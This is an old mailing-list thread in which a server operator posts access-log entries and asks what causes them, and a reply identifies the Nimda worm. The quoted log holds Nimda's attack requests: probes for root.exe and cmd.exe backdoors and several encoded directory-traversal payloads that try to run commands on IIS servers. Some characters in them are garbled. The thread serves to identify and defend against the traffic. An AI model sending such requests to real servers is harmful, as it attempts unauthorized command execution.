Nimda virus from unpatched microft servers.But its getting a 404 error so should be okay.
On 11/May/2002 04:59:49, Dave Culbertson wrote: > Does anyone recognize what kind of virus or bot would cause the following access log >entries? > > 64.65.199.33 - - [04/May/2002:00:45:06 -0400] "GET /scripts/root.exe?/c+dir >HTTP/1.0" 404 565 0 "-" "-" > 64.65.199.33 - - [04/May/2002:00:45:07 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" >404 565 0 "-" "-" > 64.65.199.33 - - [04/May/2002:00:45:08 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 565 0 "-" "-" > 64.65.199.33 - - [04/May/2002:00:45:09 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 565 0 "-" "-" > 64.65.199.33 - - [04/May/2002:00:45:10 -0400] "GET >/scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-" > 64.65.199.33 - - [04/May/2002:00:45:11 -0400] "GET >/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 >"-" "-" > 64.65.199.33 - - [04/May/2002:00:45:12 -0400] "GET >/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 >"-" "-" > 64.65.199.33 - - [04/May/2002:00:45:13 -0400] "GET >/msadc/..%5c../..%5c../..%5c/..� ../..� ../..� ../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 565 0 "-" "-" > 64.65.199.33 - - [04/May/2002:00:45:13 -0400] "GET >/scripts/..� ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-" > 64.65.199.33 - - [04/May/2002:00:45:14 -0400] "GET >/scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-" > 64.65.199.33 - - [04/May/2002:00:45:15 -0400] "GET >/scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-" > 64.65.199.33 - - [04/May/2002:00:45:16 -0400] "GET >/scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-" > 64.65.199.33 - - [04/May/2002:00:45:17 -0400] "GET >/scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-" > 64.65.199.33 - - [04/May/2002:00:45:21 -0400] "GET >/scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-" > 64.65.199.33 - - [04/May/2002:00:45:23 -0400] "GET >/scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-" > 64.65.199.33 - - [04/May/2002:00:45:25 -0400] "GET >/scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-" > > I am being accessed by quite a few computers with the same or simular entries and >would like to know the name of what this is. Thanks. > > Dave Culbertson > > ------------------------------------------------------- > To unsubscribe please go to <A TARGET="_blank" >HREF="http://www.sambar.ch/list/";>http://www.sambar.ch/list/</A> > > > > > > ------------------------------------------------------- To unsubscribe please go to http://www.sambar.ch/list/
